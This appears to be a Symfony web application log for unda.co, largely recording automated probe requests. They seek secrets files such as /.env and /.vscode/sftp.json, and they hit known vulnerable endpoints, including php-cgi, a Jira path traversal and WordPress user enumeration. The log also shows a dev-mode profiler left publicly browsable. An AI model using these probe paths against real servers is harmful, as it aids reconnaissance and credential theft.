[2025-12-16 08:35:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:35:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:36:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:36:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:36:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:36:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:36:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 08:36:08] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
[2025-12-16 08:36:08] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-16 08:36:08] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 08:36:08] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 08:36:08] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 08:36:08] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 08:36:08] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 08:46:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=exception","method":"GET"} []
[2025-12-16 08:46:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-16 08:49:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d5ef8","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/1d5ef8?panel=security","method":"GET"} []
[2025-12-16 08:49:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-16 08:50:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=validator","method":"GET"} []
[2025-12-16 08:50:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-16 08:57:15] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?fbclid=IwZXh0bgNhZW0CMTEAc3J0YwZhcHBfaWQMMjU2MjgxMDQwNTU4AAEe8PvSDPdFba3AyDlp_BtlNdAYE080HArTAqRtBUWAsNAnKa5WXv2z2ev_eLY_aem_NgYpH0NbObLfGdC3g9g7AA","method":"GET"} []
[2025-12-16 08:57:20] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"17c380","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/17c380","method":"GET"} []
[2025-12-16 09:03:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 09:12:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 09:22:20] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-16 09:37:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
[2025-12-16 09:37:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
[2025-12-16 09:41:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"07a9c5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/07a9c5","method":"GET"} []
[2025-12-16 09:41:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 09:42:49] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-16 09:42:49] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-16 09:42:49] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 09:42:49] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-16 09:42:49] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 09:42:49] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 09:42:49] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 09:42:49] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-16 09:43:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"533e9e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/533e9e?panel=config","method":"GET"} []
[2025-12-16 09:43:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-16 09:49:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=router","method":"GET"} []
[2025-12-16 09:49:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-16 09:54:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f469b8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f469b8","method":"GET"} []
[2025-12-16 09:54:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 10:08:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 10:08:21] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
